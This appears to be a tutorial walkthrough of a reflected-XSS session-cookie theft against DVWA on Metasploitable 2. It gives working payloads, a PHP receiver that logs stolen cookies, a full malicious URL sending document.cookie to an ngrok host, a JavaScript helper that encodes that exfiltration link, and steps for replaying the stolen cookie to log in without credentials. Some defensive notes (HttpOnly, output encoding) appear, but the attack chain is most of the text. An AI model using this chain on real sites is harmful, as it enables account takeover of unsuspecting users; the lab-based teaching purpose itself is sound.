Steal Session Cookies Using Reflected XSS
What is XSS (Cross-site scripting)?
- Cross-site scripting is a client-side attack: the malicious code runs in the victim's browser, not on the server.
- It usually happens because the application reflects user input into the page without encoding it, so the browser cannot tell the input apart from the page's own markup and executes it as part of the page's HTML and JavaScript.
Types of XSS vulnerability
- Reflected XSS (the payload comes from the request, typically the URL, and is echoed back in the response)
- Stored XSS (the payload is saved by the application and served to every visitor of the affected page)
- DOM-based XSS (client-side JavaScript itself writes the untrusted value into the page)
This post focuses on reflected XSS, used to steal session cookies.
What can an attacker do with this vulnerability?
- Steal your session cookies
- Run a JavaScript keylogger in the page
- Inject other malicious links or content into the page
- Access your webcam and microphone, if the site has already been granted that permission
- Etc.
How does XSS work?
First the attacker finds an XSS vulnerability in a website.
Next the attacker builds a malicious link that carries a malicious script (e.g. a keylogger), sends the link to the victim, and the victim opens it in their browser.
What happens then?
The injected JavaScript executes in the victim's browser, in the context of the vulnerable site. If the attacker included a keylogger or a session-cookie stealer, the script runs and the keystrokes or cookies are sent to the attacker's machine.
Cookie stealing (with reflected XSS)
- Imagine the Amazon website had an XSS vulnerability and you are logged in to Amazon in your browser
- The attacker sends you an Amazon link
- The link the attacker sends contains malicious JavaScript code
- If you open it, your browser authenticates you to the Amazon site using your session cookies, and the page reflects the attacker's script
- The JavaScript code reads document.cookie and sends the cookies to the attacker
- Note that document.cookie only exposes cookies without the HttpOnly flag; a session cookie marked HttpOnly cannot be read this way, which is why that flag matters
Let's do it
I'm using DVWA on Metasploitable 2 here for testing.
Let's log in.
OK. This is the page to test reflected XSS. It has an input field; just enter a string into the input field.
I gave the name NullXploiter to the input field and it was reflected.
OK, now inject an XSS payload.
Payload : <script>alert("Hacked")</script>
See, the alert box is triggered because the JavaScript code was executed. Let's look at the page source.
The payload is embedded as-is in the source code and executed.
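To show why the payload lands in the page source unchanged, here is an added example (not code from the original post or from DVWA) that models the reflected-XSS page in JavaScript. It assumes the vulnerable handler echoes the name parameter straight into the HTML, as the page source above shows, and puts next to it the fix DVWA's higher security levels apply, the equivalent of PHP's htmlspecialchars():

```javascript
// Added example, not part of the original post: a model of the DVWA reflected-XSS
// page. The vulnerable branch is assumed to echo the parameter unchanged; the
// hardened branch applies the encoding PHP's htmlspecialchars() would.

// Vulnerable sink: the query parameter is concatenated straight into the HTML.
function renderLow(name) {
  return '<pre>Hello ' + name + '</pre>';
}

// Equivalent of htmlspecialchars($name, ENT_QUOTES, 'UTF-8'): the five characters
// that can open a tag, close a tag, or break out of an attribute become entities.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened sink: same page, but the parameter is encoded before it is reflected.
function renderHigh(name) {
  return '<pre>Hello ' + escapeHtml(name) + '</pre>';
}

// Count the element tags the browser's HTML parser would see in a response.
function countTags(html) {
  return (html.match(/<\/?[a-zA-Z]/g) || []).length;
}

// How many elements did the reflected value add to the page, compared with an
// empty name? Anything above zero means the input changed the page's structure.
function injectedTagCount(render, name) {
  return countTags(render(name)) - countTags(render(''));
}

// Constructed payloads: the alert from the post, plus an event-handler variant
// that needs no <script> element at all.
const PAYLOADS = [
  '<script>alert("Hacked")</script>',
  '<img src=x onerror=alert(1)>',
];

for (const p of PAYLOADS) {
  console.log('low :', renderLow(p), '-> injected tags:', injectedTagCount(renderLow, p));
  console.log('high:', renderHigh(p), '-> injected tags:', injectedTagCount(renderHigh, p));
}
```

With the low-level sink the script payload adds two elements (the opening and closing script tags) and the img payload adds one; with the encoded sink both add zero, because no raw `<` survives into the markup.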
Now let's create a cookie stealer using PHP. Create a file called index.php
with the following source code. It takes the cookie from the c query parameter and appends it to log.txt:
<?php
// Receiver for the exfiltrated cookie: the payload sends it in the "c" query parameter
$cookie = isset($_GET['c']) ? $_GET['c'] : '';
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "\n\n");
fclose($file);
?>
The vulnerability is identified and the cookie stealer is ready.
Now prepare the malicious link.
Copy the base URL and modify it:
http://192.168.43.199/dvwa/vulnerabilities/xss_r/?name=
The above is the base URL; the JavaScript that steals the cookies is injected after name=.
One more thing: start a PHP server in the same directory as index.php to receive the cookies, and use ngrok for port forwarding.
cmd : php -S localhost:7777
If you perform the attack against a victim on another network, use ngrok to forward the port so the receiver is reachable from the internet.
Now inject the payload into the base URL:
http://192.168.43.199/dvwa/vulnerabilities/xss_r/?name=<script>document.location="http://515f-2401-4900-4841-612b-5c8-4c6-dc92-16a1.ngrok.io/?c="+document.cookie</script>
We injected our server's URL and document.cookie for cookie stealing: the script navigates the victim's browser to our receiver with the cookies appended as the c parameter.
One caveat: pasted raw like this, the + between the string and document.cookie sits inside a query string, where PHP's $_GET decodes + as a space, so the reflected script is broken. URL-encode the payload before using it as a link (at minimum + as %2B).
Now the malicious link is ready. If the victim clicks the malicious URL they go to the DVWA website, and if the victim is already logged in, the cookies are stolen and sent to our machine.
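The link-building and exfiltration steps above, as an added example (not code from the original post): it assembles the payload with proper URL encoding, shows what the vulnerable server decodes from the query string, and mirrors what index.php receives. The DVWA base URL and the ngrok host are the ones from this post; the cookie string is constructed, and the encodeURIComponent() around document.cookie is an improvement over the post's payload so a cookie containing & cannot be split into extra parameters:

```javascript
// Added example, not part of the original post. Builds the reflected-XSS link the
// way a browser must see it, and shows what the receiver gets back.
// BASE_URL and RECEIVER are the post's; the cookie value below is constructed.

const BASE_URL = 'http://192.168.43.199/dvwa/vulnerabilities/xss_r/?name=';
const RECEIVER = 'http://515f-2401-4900-4841-612b-5c8-4c6-dc92-16a1.ngrok.io/?c=';

// The script the victim's browser will run: navigate to the receiver with
// document.cookie appended. encodeURIComponent inside the payload keeps a
// cookie containing '&' or '=' in one parameter.
function buildPayload(receiver) {
  return '<script>document.location="' + receiver + '"+encodeURIComponent(document.cookie)</script>';
}

// The payload must be URL-encoded before it goes into the query string;
// encodeURIComponent turns '+' into '%2B', '"' into '%22', '<' into '%3C', etc.
function buildMaliciousUrl(base, receiver) {
  return base + encodeURIComponent(buildPayload(receiver));
}

// What the vulnerable server sees in $_GET['name']: URLSearchParams applies the
// same application/x-www-form-urlencoded decoding PHP does ('+' becomes a space).
function serverDecodedName(url) {
  return new URL(url).searchParams.get('name');
}

// The post's payload pasted raw, with a literal '+' in the query string.
const RAW_PAYLOAD = '<script>document.location="' + RECEIVER + '"+document.cookie</script>';

// What the victim's browser does once the script runs: request the receiver URL.
// Simulated with a constructed cookie standing in for document.cookie.
function victimRedirect(receiver, documentCookie) {
  return receiver + encodeURIComponent(documentCookie);
}

// What index.php reads from $_GET['c'].
function receiverExtractCookie(requestUrl) {
  return new URL(requestUrl).searchParams.get('c');
}

const link = buildMaliciousUrl(BASE_URL, RECEIVER);
console.log('link            :', link);
console.log('server decodes  :', serverDecodedName(link));            // intact script
console.log('raw link decodes:', serverDecodedName(BASE_URL + RAW_PAYLOAD)); // '+' lost
const stolen = receiverExtractCookie(victimRedirect(RECEIVER, 'security=low; PHPSESSID=constructed0123'));
console.log('receiver logs   :', stolen);
```

The raw form decodes to `..."` followed by a space and `document.cookie`, which is a JavaScript syntax error, while the encoded link decodes back to the exact payload; the receiver side recovers the full cookie string either way once the redirect happens.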
Now copy the URL and put it in a browser.
Let's assume it's the victim's browser.
Hit enter.
It cannot steal cookies right now because my browser's XSS auditor is on,
so I copied only the JavaScript code, pasted it into the input field manually and hit enter.
Let's see: the URL redirected to the malicious link and the cookies were stolen.
Now check the URL: it reflects the session cookie, and also check the log file.
Now grab the cookie value and log in to DVWA without authentication.
I'm using the Chrome browser right now.
OK, now log in without credentials, using only the stolen cookies.
I'm using the EditThisCookie extension.
Now insert the cookie value in the extension and save it.
Now directly access the index page.
Now hit enter...
Success!!!
We are logged in directly on the index page.